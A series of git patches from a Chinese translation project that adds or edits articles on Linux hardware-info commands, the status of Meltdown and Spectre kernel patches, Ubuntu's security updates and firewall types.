======
-你们好,linux 爱好者们,在这篇文章中,我将讨论一些作为系统管理员重要的事。众所周知,作为一名优秀的系统管理员意味着要了解有关 IT 基础架构的所有信息,并掌握有关服务器的所有信息,无论是硬件还是操作系统。所以下面的命令将帮助你了解所有的硬件和系统信息。
-#### 1- 查看系统信息
+你们好,Linux 爱好者们,在这篇文章中,我将讨论一些作为系统管理员重要的事。众所周知,作为一名优秀的系统管理员意味着要了解有关 IT 基础架构的所有信息,并掌握有关服务器的所有信息,无论是硬件还是操作系统。所以下面的命令将帮助你了解所有的硬件和系统信息。
+### 1 查看系统信息
+
+```
$ uname -a
+```
![uname command][2]
它会为你提供有关系统的所有信息。它会为你提供系统的内核名、主机名、内核版本、内核发布号、硬件名称。
-#### 2- 查看硬件信息
+### 2 查看硬件信息
+```
$ lshw
+```
![lshw command][4]
-使用 lshw 将在屏幕上显示所有硬件信息。
+使用 `lshw` 将在屏幕上显示所有硬件信息。
-#### 3- 查看块设备(硬盘、闪存驱动器)信息
+### 3 查看块设备(硬盘、闪存驱动器)信息
+```
$ lsblk
+```
![lsblk command][6]
-lsblk 命令在屏幕上打印关于块设备的所有信息。使用 lsblk -a 显示所有块设备。
+`lsblk` 命令在屏幕上打印关于块设备的所有信息。使用 `lsblk -a` 可以显示所有块设备。
-#### 4- 查看 CPU 信息
+### 4 查看 CPU 信息
+```
$ lscpu
+```
![lscpu command][8]
-lscpu 在屏幕上显示所有 CPU 信息。
+`lscpu` 在屏幕上显示所有 CPU 信息。
-#### 5- 查看 PCI 信息
+### 5 查看 PCI 信息
+```
$ lspci
+```
![lspci command][10]
-所有的网络适配器卡、USB 卡、图形卡都被称为 PCI。要查看他们的信息使用 lspci。
+所有的网络适配器卡、USB 卡、图形卡都被称为 PCI。要查看他们的信息使用 `lspci`。
-lspci -v 将提供有关 PCI 卡的详细信息。
+`lspci -v` 将提供有关 PCI 卡的详细信息。
-lspci -t 会以树形格式显示它们。
+`lspci -t` 会以树形格式显示它们。
-#### 6- 查看 USB 信息
+### 6 查看 USB 信息
+```
$ lsusb
+```
![lsusb command][12]
-要查看有关连接到机器的所有 USB 控制器和设备的信息,我们使用 lsusb。
+要查看有关连接到机器的所有 USB 控制器和设备的信息,我们使用 `lsusb`。
-#### 7- 查看 SCSI 信息
+### 7 查看 SCSI 信息
-$ lssci
+```
+$ lsscsi
+```
-![lssci][14]
+![lsscsi][14]
-要查看 SCSI 信息输入 lsscsi。lsscsi -s 会显示分区的大小。
+要查看 SCSI 信息输入 `lsscsi`。`lsscsi -s` 会显示分区的大小。
-#### 8- 查看文件系统信息
+### 8 查看文件系统信息
+```
$ fdisk -l
+```
![fdisk command][16]
-使用 fdisk -l 将显示有关文件系统的信息。虽然 fdisk 的主要功能是修改文件系统,但是也可以创建新分区,删除旧分区(详情在我以后的教程中)。
+使用 `fdisk -l` 将显示有关文件系统的信息。虽然 `fdisk` 的主要功能是修改文件系统,但是也可以创建新分区,删除旧分区(详情在我以后的教程中)。
-就是这些了,我的 Linux 爱好者们。建议你在**[这里][17]**和**[这里][18]**查看我文章中关于另外的 Linux 命令。
+就是这些了,我的 Linux 爱好者们。建议你在**[这里][17]**和**[这里][18]**的文章中查看关于另外的 Linux 命令。
--------------------------------------------------------------------------------
via: http://linuxtechlab.com/commands-system-hardware-info/
作者:[Shusain][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
+译者:[geekpi](https://github.com/geekpi)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 56ceb13979f92917ee9103f2837c129fd3f3939b Mon Sep 17 00:00:00 2001
From: Ezio
Date: Mon, 8 Jan 2018 10:32:11 +0800
Subject: [PATCH 156/371] =?UTF-8?q?20180108-1=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...eltdown and Spectre Linux Kernel Status.md | 101 ++++++++++++++++++
1 file changed, 101 insertions(+)
create mode 100644 sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
diff --git a/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md b/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
new file mode 100644
index 0000000000..1ade61bd3a
--- /dev/null
+++ b/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
@@ -0,0 +1,101 @@
+Meltdown and Spectre Linux Kernel Status
+============================================================
+
+
+By now, everyone knows that something “big” just got announced regarding computer security. Heck, when the [Daily Mail does a report on it][1] , you know something is bad…
+
+Anyway, I’m not going to go into the details about the problems being reported, other than to point you at the wonderfully written [Project Zero paper on the issues involved here][2]. They should just give out the 2018 [Pwnie][3] award right now, it’s that amazingly good.
+
+If you do want technical details for how we are resolving those issues in the kernel, see the always awesome [lwn.net writeup for the details][4].
+
+Also, here’s a good summary of [lots of other postings][5] that includes announcements from various vendors.
+
+As for how this was all handled by the companies involved, well this could be described as a textbook example of how _NOT_ to interact with the Linux kernel community properly. The people and companies involved know what happened, and I’m sure it will all come out eventually, but right now we need to focus on fixing the issues involved, and not pointing blame, no matter how much we want to.
+
+### What you can do right now
+
+If your Linux systems are running a normal Linux distribution, go update your kernel. They should all have the updates in them already. And then keep updating them over the next few weeks, we are still working out lots of corner case bugs given that the testing involved here is complex given the huge variety of systems and workloads this affects. If your distro does not have kernel updates, then I strongly suggest changing distros right now.
+
+However there are lots of systems out there that are not running “normal” Linux distributions for various reasons (rumor has it that it is way more than the “traditional” corporate distros). They rely on the LTS kernel updates, or the normal stable kernel updates, or they are in-house franken-kernels. For those people here’s the status of what is going on regarding all of this mess in the upstream kernels you can use.
+
+### Meltdown – x86
+
+Right now, Linus’s kernel tree contains all of the fixes we currently know about to handle the Meltdown vulnerability for the x86 architecture. Go enable the CONFIG_PAGE_TABLE_ISOLATION kernel build option, and rebuild and reboot and all should be fine.
+
+However, Linus’s tree is currently at 4.15-rc6 + some outstanding patches. 4.15-rc7 should be out tomorrow, with those outstanding patches to resolve some issues, but most people do not run a -rc kernel in a “normal” environment.
+
+Because of this, the x86 kernel developers have done a wonderful job in their development of the page table isolation code, so much so that the backport to the latest stable kernel, 4.14, has been almost trivial for me to do. This means that the latest 4.14 release (4.14.12 at this moment in time), is what you should be running. 4.14.13 will be out in a few more days, with some additional fixes in it that are needed for some systems that have boot-time problems with 4.14.12 (it’s an obvious problem, if it does not boot, just add the patches now queued up.)
+
+I would personally like to thank Andy Lutomirski, Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, Peter Zijlstra, Josh Poimboeuf, Juergen Gross, and Linus Torvalds for all of the work they have done in getting these fixes developed and merged upstream in a form that was so easy for me to consume to allow the stable releases to work properly. Without that effort, I don’t even want to think about what would have happened.
+
+For the older long term stable (LTS) kernels, I have leaned heavily on the wonderful work of Hugh Dickins, Dave Hansen, Jiri Kosina and Borislav Petkov to bring the same functionality to the 4.4 and 4.9 stable kernel trees. I had also had immense help from Guenter Roeck, Kees Cook, Jamie Iles, and many others in tracking down nasty bugs and missing patches. I want to also call out David Woodhouse, Eduardo Valentin, Laura Abbott, and Rik van Riel for their help with the backporting and integration as well, their help was essential in numerous tricky places.
+
+These LTS kernels also have the CONFIG_PAGE_TABLE_ISOLATION build option that should be enabled to get complete protection.
+
+As this backport is very different from the mainline version that is in 4.14 and 4.15, there are different bugs happening, right now we know of some VDSO issues that are getting worked on, and some odd virtual machine setups are reporting strange errors, but those are the minority at the moment, and should not stop you from upgrading at all right now. If you do run into problems with these releases, please let us know on the stable kernel mailing list.
+
+If you rely on any other kernel tree other than 4.4, 4.9, or 4.14 right now, and you do not have a distribution supporting you, you are out of luck. The lack of patches to resolve the Meltdown problem is so minor compared to the hundreds of other known exploits and bugs that your kernel version currently contains. You need to worry about that more than anything else at this moment, and get your systems up to date first.
+
+Also, go yell at the people who forced you to run an obsoleted and insecure kernel version, they are the ones that need to learn that doing so is a totally reckless act.
+
+### Meltdown – ARM64
+
+Right now the ARM64 set of patches for the Meltdown issue are not merged into Linus’s tree. They are [staged and ready to be merged][6] into 4.16-rc1 once 4.15 is released in a few weeks. Because these patches are not in a released kernel from Linus yet, I can not backport them into the stable kernel releases (hey, we have [rules][7] for a reason…)
+
+Due to them not being in a released kernel, if you rely on ARM64 for your systems (i.e. Android), I point you at the [Android Common Kernel tree][8] All of the ARM64 fixes have been merged into the [3.18,][9] [4.4,][10] and [4.9 branches][11] as of this point in time.
+
+I would strongly recommend just tracking those branches as more fixes get added over time due to testing and things catch up with what gets merged into the upstream kernel releases over time, especially as I do not know when these patches will land in the stable and LTS kernel releases at this point in time.
+
+For the 4.4 and 4.9 LTS kernels, odds are these patches will never get merged into them, due to the large number of prerequisite patches required. All of those prerequisite patches have been long merged and tested in the android-common kernels, so I think it is a better idea to just rely on those kernel branches instead of the LTS release for ARM systems at this point in time.
+
+Also note, I merge all of the LTS kernel updates into those branches usually within a day or so of being released, so you should be following those branches no matter what, to ensure your ARM systems are up to date and secure.
+
+### Spectre
+
+Now things get “interesting”…
+
+Again, if you are running a distro kernel, you _might_ be covered as some of the distros have merged various patches into them that they claim mitigate most of the problems here. I suggest updating and testing for yourself to see if you are worried about this attack vector
+
+For upstream, well, the status is there is no fixes merged into any upstream tree for these types of issues yet. There are numerous patches floating around on the different mailing lists that are proposing solutions for how to resolve them, but they are under heavy development, some of the patch series do not even build or apply to any known trees, the series conflict with each other, and it’s a general mess.
+
+This is due to the fact that the Spectre issues were the last to be addressed by the kernel developers. All of us were working on the Meltdown issue, and we had no real information on exactly what the Spectre problem was at all, and what patches were floating around were in even worse shape than what have been publicly posted.
+
+Because of all of this, it is going to take us in the kernel community a few weeks to resolve these issues and get them merged upstream. The fixes are coming in to various subsystems all over the kernel, and will be collected and released in the stable kernel updates as they are merged, so again, you are best off just staying up to date with either your distribution’s kernel releases, or the LTS and stable kernel releases.
+
+It’s not the best news, I know, but it’s reality. If it’s any consolation, it does not seem that any other operating system has full solutions for these issues either, the whole industry is in the same boat right now, and we just need to wait and let the developers solve the problem as quickly as they can.
+
+The proposed solutions are not trivial, but some of them are amazingly good. The [Retpoline][12] post from Paul Turner is an example of some of the new concepts being created to help resolve these issues. This is going to be an area of lots of research over the next years to come up with ways to mitigate the potential problems involved in hardware that wants to try to predict the future before it happens.
+
+### Other arches
+
+Right now, I have not seen patches for any other architectures than x86 and arm64\. There are rumors of patches floating around in some of the enterprise distributions for some of the other processor types, and hopefully they will surface in the weeks to come to get merged properly upstream. I have no idea when that will happen, if you are dependant on a specific architecture, I suggest asking on the arch-specific mailing list about this to get a straight answer.
+
+### Conclusion
+
+Again, update your kernels, don’t delay, and don’t stop. The updates to resolve these problems will be continuing to come for a long period of time. Also, there are still lots of other bugs and security issues being resolved in the stable and LTS kernel releases that are totally independent of these types of issues, so keeping up to date is always a good idea.
+
+Right now, there are a lot of very overworked, grumpy, sleepless, and just generally pissed off kernel developers working as hard as they can to resolve these issues that they themselves did not cause at all. Please be considerate of their situation right now. They need all the love and support and free supply of their favorite beverage that we can provide them to ensure that we all end up with fixed systems as soon as possible.
+
+--------------------------------------------------------------------------------
+
+via: http://kroah.com/log/blog/2018/01/06/meltdown-status/
+
+作者:[Greg Kroah-Hartman ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://kroah.com
+[1]:http://www.dailymail.co.uk/sciencetech/article-5238789/Intel-says-security-updates-fix-Meltdown-Spectre.html
+[2]:https://googleprojectzero.blogspot.fr/2018/01/reading-privileged-memory-with-side.html
+[3]:https://pwnies.com/
+[4]:https://lwn.net/Articles/743265/
+[5]:https://lwn.net/Articles/742999/
+[6]:https://git.kernel.org/pub/scm/linux/kernel/git/arm64/linux.git/log/?h=kpti
+[7]:https://www.kernel.org/doc/html/latest/process/stable-kernel-rules.html
+[8]:https://android.googlesource.com/kernel/common/
+[9]:https://android.googlesource.com/kernel/common/+/android-3.18
+[10]:https://android.googlesource.com/kernel/common/+/android-4.4
+[11]:https://android.googlesource.com/kernel/common/+/android-4.9
+[12]:https://support.google.com/faqs/answer/7625886
From 4b88013499c9b1092d1cb03a5cbb2680d1bac2a1 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Mon, 8 Jan 2018 10:50:45 +0800
Subject: [PATCH 157/371] Translating by stevenzdg988
---
.../tech/20171030 How To Create Custom Ubuntu Live CD Image.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md b/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
index 71c65f4ac0..610efc8739 100644
--- a/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
+++ b/sources/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
@@ -1,4 +1,4 @@
-How To Create Custom Ubuntu Live CD Image
+Translating by stevenzdg988 on How To Create Custom Ubuntu Live CD Image
======
![](https://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-720x340.png)
From 714a953dc01a9808adf205f7c6a22f502ca1e4c4 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Mon, 8 Jan 2018 11:21:40 +0800
Subject: [PATCH 158/371] =?UTF-8?q?20180108-2=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...or the Meltdown Spectre Vulnerabilities.md | 74 +++++++++++++++++++
1 file changed, 74 insertions(+)
create mode 100644 sources/tech/20180104 Ubuntu Updates for the Meltdown Spectre Vulnerabilities.md
diff --git a/sources/tech/20180104 Ubuntu Updates for the Meltdown Spectre Vulnerabilities.md b/sources/tech/20180104 Ubuntu Updates for the Meltdown Spectre Vulnerabilities.md
new file mode 100644
index 0000000000..c44d121e68
--- /dev/null
+++ b/sources/tech/20180104 Ubuntu Updates for the Meltdown Spectre Vulnerabilities.md
@@ -0,0 +1,74 @@
+Ubuntu Updates for the Meltdown / Spectre Vulnerabilities
+============================================================
+
+![](https://insights.ubuntu.com/wp-content/uploads/0372/Screenshot-from-2018-01-04-12-39-25.png)
+
+* For up-to-date patch, package, and USN links, please refer to: [https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown][2]
+
+Unfortunately, you’ve probably already read about one of the most widespread security issues in modern computing history — colloquially known as “[Meltdown][5]” ([CVE-2017-5754][6]) and “[Spectre][7]” ([CVE-2017-5753][8] and [CVE-2017-5715][9]) — affecting practically every computer built in the last 10 years, running any operating system. That includes [Ubuntu][10].
+
+I say “unfortunately”, in part because there was a coordinated release date of January 9, 2018, agreed upon by essentially every operating system, hardware, and cloud vendor in the world. By design, operating system updates would be available at the same time as the public disclosure of the security vulnerability. While it happens rarely, this an industry standard best practice, which has broken down in this case.
+
+At its heart, this vulnerability is a CPU hardware architecture design issue. But there are billions of affected hardware devices, and replacing CPUs is simply unreasonable. As a result, operating system kernels — Windows, MacOS, Linux, and many others — are being patched to mitigate the critical security vulnerability.
+
+Canonical engineers have been working on this since we were made aware under the embargoed disclosure (November 2017) and have worked through the Christmas and New Years holidays, testing and integrating an incredibly complex patch set into a broad set of Ubuntu kernels and CPU architectures.
+
+Ubuntu users of the 64-bit x86 architecture (aka, amd64) can expect updated kernels by the original January 9, 2018 coordinated release date, and sooner if possible. Updates will be available for:
+
+* Ubuntu 17.10 (Artful) — Linux 4.13 HWE
+
+* Ubuntu 16.04 LTS (Xenial) — Linux 4.4 (and 4.4 HWE)
+
+* Ubuntu 14.04 LTS (Trusty) — Linux 3.13
+
+* Ubuntu 12.04 ESM** (Precise) — Linux 3.2
+ * Note that an [Ubuntu Advantage license][1] is required for the 12.04 ESM kernel update, as Ubuntu 12.04 LTS is past its end-of-life
+
+Ubuntu 18.04 LTS (Bionic) will release in April of 2018, and will ship a 4.15 kernel, which includes the [KPTI][11] patchset as integrated upstream.
+
+Ubuntu optimized kernels for the Amazon, Google, and Microsoft public clouds are also covered by these updates, as well as the rest of Canonical’s [Certified Public Clouds][12] including Oracle, OVH, Rackspace, IBM Cloud, Joyent, and Dimension Data.
+
+These kernel fixes will not be [Livepatch-able][13]. The source code changes required to address this problem is comprised of hundreds of independent patches, touching hundreds of files and thousands of lines of code. The sheer complexity of this patchset is not compatible with the Linux kernel Livepatch mechanism. An update and a reboot will be required to active this update.
+
+Furthermore, you can expect Ubuntu security updates for a number of other related packages, including CPU microcode, GCC and QEMU in the coming days.
+
+We don’t have a performance analysis to share at this time, but please do stay tuned here as we’ll followup with that as soon as possible.
+
+Thanks,
+[@DustinKirkland][14]
+VP of Product
+Canonical / Ubuntu
+
+### About the author
+
+ ![Dustin's photo](https://insights.ubuntu.com/wp-content/uploads/6f45/kirkland.jpg)
+
+Dustin Kirkland is part of Canonical's Ubuntu Product and Strategy team, working for Mark Shuttleworth, and leading the technical strategy, road map, and life cycle of the Ubuntu Cloud and IoT commercial offerings. Formerly the CTO of Gazzang, a venture funded start-up acquired by Cloudera, Dustin designed and implemented an innovative key management system for the cloud, called zTrustee, and delivered comprehensive security for cloud and big data platforms with eCryptfs and other encryption technologies. Dustin is an active Core Developer of the Ubuntu Linux distribution, maintainer of 20+ open source projects, and the creator of Byobu, DivItUp.com, and LinuxSearch.org. A Fightin' Texas Aggie Class of 2001 graduate, Dustin lives in Austin, Texas, with his wife Kim, daughters, and his Australian Shepherds, Aggie and Tiger. Dustin is also an avid home brewer.
+
+[More articles by Dustin][3]
+
+--------------------------------------------------------------------------------
+
+via: https://insights.ubuntu.com/2018/01/04/ubuntu-updates-for-the-meltdown-spectre-vulnerabilities/
+
+作者:[Dustin Kirkland][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://insights.ubuntu.com/author/kirkland/
+[1]:https://www.ubuntu.com/support/esm
+[2]:https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown
+[3]:https://insights.ubuntu.com/author/kirkland/
+[4]:https://insights.ubuntu.com/author/kirkland/
+[5]:https://en.wikipedia.org/wiki/Meltdown_(security_vulnerability)
+[6]:https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-5754.html
+[7]:https://en.wikipedia.org/wiki/Spectre_(security_vulnerability)
+[8]:https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-5753.html
+[9]:https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-5715.html
+[10]:https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SpectreAndMeltdown
+[11]:https://lwn.net/Articles/742404/
+[12]:https://partners.ubuntu.com/programmes/public-cloud
+[13]:https://www.ubuntu.com/server/livepatch
+[14]:https://twitter.com/dustinkirkland
From 516c7a2002e1ed9b54a25f03b412f935a5259ad3 Mon Sep 17 00:00:00 2001
From: zjon
Date: Mon, 8 Jan 2018 12:24:19 +0800
Subject: [PATCH 159/371] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=88=90?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20171011 What is a firewall.md | 73 ++++++++++-----------
1 file changed, 35 insertions(+), 38 deletions(-)
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
index 3401995721..df864cf54c 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/sources/tech/20171011 What is a firewall.md
@@ -1,78 +1,75 @@
Translating by zjon
-What is a firewall?
-======
-Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
+什么是防火墙?
+=====
+基于网络的防火墙已经在美国企业无处不在,因为它们证实了抵御日益增长的威胁的防御能力。
-A recent study by network testing firm NSS Labs found that up to 80% of US large businesses run a next-generation firewall. Research firm IDC estimates the firewall and related unified threat management market was a $7.6 billion industry in 2015 and expected to reach $12.7 billion by 2020.
+通过网络测试公司 NSS 实验室最近的一项研究发现高达 80% 的美国大型企业运行着下一代防火墙。研究公司 IDC 评估防火墙和相关的统一威胁管理市场营业额在 2015 是 76 亿美元,预计到 2020 年底将达到 127 亿美元。
- **[ If you 're upgrading, here's [What to consider when deploying a next generation firewall][1].]**
+**如果你想提升,这里是[What to consider when deploying a next generation firewall][1]**
-### What is a firewall?
+### 什么是防火墙?
-Firewalls act as a perimeter defense tool that monitor traffic and either allow it or block it. Over the years functionality of firewalls has increased, and now most firewalls can not only block a set of known threats and enforce advanced access control list policies, but they can also deeply inspect individual packets of traffic and test packets to determine if they're safe. Most firewalls are deployed as network hardware that processes traffic and software that allow end users to configure and manage the system. Increasingly, software-only versions of firewalls are being deployed in highly virtualized environments to enforce policies on segmented networks or in the IaaS public cloud.
+防火墙充当一个监控流量的边界防御工具,要么允许它要么屏蔽它。 多年来,防火墙的功能不断增强,现在大多数防火墙不仅可以阻止已知的一组威胁,并执行高级访问控制列表策略,还可以深入检查各个包的流量和测试包,以确定它们是否安全。大多数防火墙被部署为网络硬件,用于处理流量和允许终端用户配置和管理系统的软件。越来越多的软件版防火墙部署到高度虚拟机环境中执行策略在被隔离的网络或 IaaS 公有云中。
-Advancements in firewall technology have created new options firewall deployments over the past decade, so now there are a handful of options for end users looking to deploy a firewall. These include:
+随着防火墙技术的进步在过去十年中创造了新的防火墙部署选项,所以现在对于部署防火墙的最终用户来说,有一些选择。这些选择包括:
-### Stateful firewalls
+### 有状态的防火墙
+ 当首次创造防火墙时,它们是无状态的,这意味着流量通过硬件,在检查被监视的每个网络包流量的过程中,并单独屏蔽或允许它。从1990年代中后期开始,防火墙的第一个主要进展是引入状态。有状态防火墙在更全面的上下文中检查流量,同时考虑到网络连接的工作状态和特性,以提供更全面的防火墙。例如,维持这状态的防火墙允许某些流量访问某些用户,同时阻塞其他用户的同一流量。
-When firewalls were first created they were stateless, meaning that the hardware that the traffic traverse through while being inspected monitored each packet of network traffic individually and either blocking or allowing it in isolation. Beginning in the mid to late 1990s, the first major advancements in firewalls was the introduction of state. Stateful firewalls examine traffic in a more holistic context, taking into account the operating state and characteristics of the network connection to provide a more holistic firewall. Maintaining this state allows the firewall to allow certain traffic to access certain users while blocking at same traffic to other users, for example.
+### 下一代防火墙
+ 多年来,防火墙增加了多种新的特性,包括深度包检查、入侵检测以及对加密流量的预防和检查。下一代防火墙(NGFWs)是指有许多先进的功能集成到防火墙的防火墙。
-### Next-generation firewalls
+### 基于代理的防火墙
-Over the years firewalls have added myriad new features, including deep packet inspection, intrusion detection and prevention and inspection of encrypted traffic. Next-generation firewalls (NGFWs) refer to firewalls that have integrated many of these advanced features into the firewall.
+这些防火墙充当请求数据的最终用户和数据源之间的网关。在传递给最终用户之前,所有的流量都通过这个代理过滤。这通过掩饰信息的原始请求者的身份来保护客户端不受威胁。
-### Proxy-based firewalls
+### Web 应用防火墙
-These firewalls act as a gateway between end users who request data and the source of that data. All traffic is filtered through this proxy before being passed on to the end user. This protects the client from exposure to threats by masking the identity of the original requester of the information.
+这些防火墙位于特定应用程序的前面,而不是在更广阔的网络的入口或则出口上。而基于代理的防火墙通常被认为是保护终端客户,WAFs 通常被认为是保护应用服务器。
-### Web application firewalls
+### 防火墙硬件
-These firewalls sit in front of specific applications as opposed to sitting on an entry or exit point of a broader network. Whereas proxy-based firewalls are typically thought of as protecting end-user clients, WAFs are typically thought of as protecting the application servers.
+防火墙硬件通常是一个简单的服务器,它可以充当路由器来过滤流量和运行防火墙软件。这些设备放置在企业网络的边缘,路由器和 Internet 服务提供商的连接点之间。通常企业可能在整个数据中心部署十几个物理防火墙。 用户需要根据用户基数的大小和 Internet 连接的速率来确定防火墙需要支持的吞吐量容量。
-### Firewall hardware
+### 防火墙软件
-Firewall hardware is typically a straightforward server that can act as a router for filtering traffic and running firewall software. These devices are placed at the edge of a corporate network, between a router and the Internet service provider's connection point. A typical enterprise may deploy dozens of physical firewalls throughout a data center. Users need to determine what throughput capacity they need the firewall to support based on the size of the user base and speed of the Internet connection.
+通常,终端用户部署多个防火墙硬件端和一个中央防火墙软件系统来管理部署。 这个中心系统是配置策略和特性的地方,在那里可以进行分析,并可以对威胁作出响应。
-### Firewall software
+### 下一代防火墙
-Typically end users deploy multiple firewall hardware endpoints and a central firewall software system to manage the deployment. This central system is where policies and features are configured, where analysis can be done and threats can be responded to.
+多年来,防火墙增加了多种新的特性,包括深度包检查、入侵检测以及对加密流量的预防和检查。下一代防火墙(NGFWs)是指集成了这些先进功能的防火墙,这里描述的是它们中的一些。
-### Next-generation firewalls
+### 有状态的检测
-Over the years firewalls have added myriad new features, including deep packet inspection, intrusion detection and prevention and inspection of encrypted traffic. Next-generation firewalls (NGFWs) refer to firewalls that have integrated many of these advanced features, and here is a description of some of them.
+阻止已知不需要的流量,这是基本的防火墙功能。
-### Stateful inspection
+### 抵御病毒
-This is the basic firewall functionality in which the device blocks known unwanted traffic
+在网络流量中搜索已知病毒和漏洞,这个功能有助于防火墙接收最新威胁的更新,并不断更新以保护它们。
-### Anti-virus
+### 入侵防御系统
-This functionality that searches for known virus and vulnerabilities in network traffic is aided by the firewall receiving updates on the latest threats and being constantly updated to protect against them.
+这类安全产品可以部署为一个独立的产品,但 IPS 功能正逐步融入 NGFWs。 虽然基本的防火墙技术识别和阻止某些类型的网络流量,但 IPS 使用更多的细粒度安全措施,如签名跟踪和异常检测,以防止不必要的威胁进入公司网络。 IPS 系统已经取代了以前这一技术的版本,入侵检测系统(IDS)的重点是识别威胁而不是遏制它们。
-### Intrusion Prevention Systems (IPS)
+### 深度包检测(DPI)
-This class of security products can be deployed as a standalone product, but IPS functionality is increasingly being integrated into NGFWs. Whereas basic firewall technologies identify and block certain types of network traffic, IPS uses more granular security measures such as signature tracing and anomaly detection to prevent unwanted threats from entering corporate networks. IPS systems have replaced the previous version of this technology, Intrusion Detection Systems (IDS) which focused more on identifying threats rather than containing them.
+DPI 可部分或用于与 IPS 的结合,但其仍然成为一个 NGFWs 的重要特征,因为它提供细粒度分析的能力,具体到流量包和流量数据的头文件。DPI 还可以用来监测出站流量,以确保敏感信息不会离开公司网络,这种技术称为数据丢失预防(DLP)。
-### Deep Packet Inspection (DPI)
+### SSL 检测
-DPI can be part of or used in conjunction with an IPS, but its nonetheless become an important feature of NGFWs because of the ability to provide granular analysis of traffic, most specifically the headers of traffic packets and traffic data. DPI can also be used to monitor outbound traffic to ensure sensitive information is not leaving corporate networks, a technology referred to as Data Loss Prevention (DLP).
+安全套接字层(SSL)检测是一个检测加密流量来测试威胁的方法。随着越来越多的流量进行加密,SSL 检测成为 DPI 技术,NGFWs 正在实施的一个重要组成部分。SSL 检测作为一个缓冲区,它在送到最终目的地之前解码流量以检测它。
-### SSL Inspection
-
-Secure Sockets Layer (SSL) Inspection is the idea of inspecting encrypted traffic to test for threats. As more and more traffic is encrypted, SSL Inspection is becoming an important component of DPI technology that is being implemented in NGFWs. SSL Inspection acts as a buffer that unencrypts the traffic before it's delivered to the final destination to test it.
-
-### Sandboxing
-
-This is one of the newer features being rolled into NGFWs and refers to the ability of a firewall to take certain unknown traffic or code and run it in a test environment to determine if it is nefarious.
+### 沙盒
+这个是被卷入 NGFWs 中的一个较新的特性,它指防火墙接收某些未知的流量或者代码,并在一个测试环境运行,以确定它是否是邪恶的能力。
--------------------------------------------------------------------------------
via: https://www.networkworld.com/article/3230457/lan-wan/what-is-a-firewall-perimeter-stateful-inspection-next-generation.html
作者:[Brandon Butler][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[zjon](https://github.com/zjon)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From fed92b66a49259e615f3bdc817a3c2439599dd3b Mon Sep 17 00:00:00 2001
From: zjon
Date: Mon, 8 Jan 2018 12:31:13 +0800
Subject: [PATCH 160/371] translated
---
{sources => translated}/tech/20171011 What is a firewall.md | 2 --
1 file changed, 2 deletions(-)
rename {sources => translated}/tech/20171011 What is a firewall.md (99%)
diff --git a/sources/tech/20171011 What is a firewall.md b/translated/tech/20171011 What is a firewall.md
similarity index 99%
rename from sources/tech/20171011 What is a firewall.md
rename to translated/tech/20171011 What is a firewall.md
index df864cf54c..cdbf18a5c9 100644
--- a/sources/tech/20171011 What is a firewall.md
+++ b/translated/tech/20171011 What is a firewall.md
@@ -1,5 +1,3 @@
-Translating by zjon
-
什么是防火墙?
=====
基于网络的防火墙已经在美国企业无处不在,因为它们证实了抵御日益增长的威胁的防御能力。
From 0b3e849d1a5f37bbeda503bb0b51581b3d3cb2b4 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Mon, 8 Jan 2018 12:55:22 +0800
Subject: [PATCH 161/371] =?UTF-8?q?=E9=87=8D=E6=96=B0=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
放弃翻译,重新进入选题
---
sources/tech/20090127 Anatomy of a Program in Memory.md | 3 ---
1 file changed, 3 deletions(-)
diff --git a/sources/tech/20090127 Anatomy of a Program in Memory.md b/sources/tech/20090127 Anatomy of a Program in Memory.md
index 25d83235c0..fff0818491 100644
--- a/sources/tech/20090127 Anatomy of a Program in Memory.md
+++ b/sources/tech/20090127 Anatomy of a Program in Memory.md
@@ -1,6 +1,3 @@
-ezio is translating
-
-
Anatomy of a Program in Memory
============================================================
